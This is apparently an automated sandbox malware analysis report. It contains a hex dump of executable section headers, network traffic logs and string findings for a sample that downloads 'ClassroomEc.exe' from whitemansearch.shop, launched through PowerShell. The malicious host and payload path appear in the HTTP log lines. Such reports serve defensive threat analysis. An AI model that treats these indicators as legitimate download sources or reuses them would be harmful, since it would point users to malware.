2e 72 64 61 74 61 00 00 6a 35 00 00 00 90 02 00 00 36 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 2b 00 00 00 d0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 51 40 00 00 00 00 03 00 00 42 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 15 00 00 00 50 03 00 00 16 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: GET /ClassroomEc.exe HTTP/1.1Host: whitemansearch.shopConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /2ZrVm4 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
              Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWomRvT9ZsLyU2pNy3cJT6ktzRP5y17XcMG-do_3Wz9iewnxFuXO9-Rn8pvEh73KR_ICtSbe2Z6e_Ei5_nwQyOLl8qvlYvQk4daw9H_NvC1gU1QG5NpYFKB5attDgP678B_k9rlXBPBo2eoAqVFlZ1Em14eX_80yS-dPAqW96lMh_xfWdLzYUhZtjmAdlCguJrDRQwMm7Rczgjwz-ZdX4GSGDCvHFQ8Zn5X9oOgweVqfE-fbaY&cb=yulbx0ey1rif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
              Source: global trafficHTTP traffic detected: GET /js/bg/zyvIRxypJp9XsXP7bFrUBd8JY_zCSu2ya-bkldlMTk8.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWomRvT9ZsLyU2pNy3cJT6ktzRP5y17XcMG-do_3Wz9iewnxFuXO9-Rn8pvEh73KR_ICtSbe2Z6e_Ei5_nwQyOLl8qvlYvQk4daw9H_NvC1gU1QG5NpYFKB5attDgP678B_k9rlXBPBo2eoAqVFlZ1Em14eX_80yS-dPAqW96lMh_xfWdLzYUhZtjmAdlCguJrDRQwMm7Rczgjwz-ZdX4GSGDCvHFQ8Zn5X9oOgweVqfE-fbaY&cb=yulbx0ey1rifAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWomRvT9ZsLyU2pNy3cJT6ktzRP5y17XcMG-do_3Wz9iewnxFuXO9-Rn8pvEh73KR_ICtSbe2Z6e_Ei5_nwQyOLl8qvlYvQk4daw9H_NvC1gU1QG5NpYFKB5attDgP678B_k9rlXBPBo2eoAqVFlZ1Em14eX_80yS-dPAqW96lMh_xfWdLzYUhZtjmAdlCguJrDRQwMm7Rczgjwz-ZdX4GSGDCvHFQ8Zn5X9oOgweVqfE-fbaY&cb=yulbx0ey1rifAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=heMuRbMeN2sFtAl&MD=ETfHWz5l HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=heMuRbMeN2sFtAl&MD=ETfHWz5l HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=00000000000000000000000000000000000000005071B001ED HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
              Source: global trafficHTTP traffic detected: GET /setup HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: whitemansearch.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ClassroomEc.exe HTTP/1.1Host: whitemansearch.shopConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: whitemansearch.shop
              Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: powershell.exe, 00000008.00000002.2240635264.0000023DA2AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsA
              Source: powershell.exe, 00000006.00000002.2363821774.000001E868C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft8
              Source: powershell.exe, 00000008.00000002.2121297266.0000023D88A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
              Source: svchost.exe, 00000005.00000003.2843545371.0000011ECA302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/a7cbhm53ik274vwlrk6bjaq5su_2024.2.14.0/go
              Source: svchost.exe, 00000005.00000003.2013768380.0000011ECA300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000006.00000002.2261109979.000001E85253E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2351092206.000001E860CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2351092206.000001E860B82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
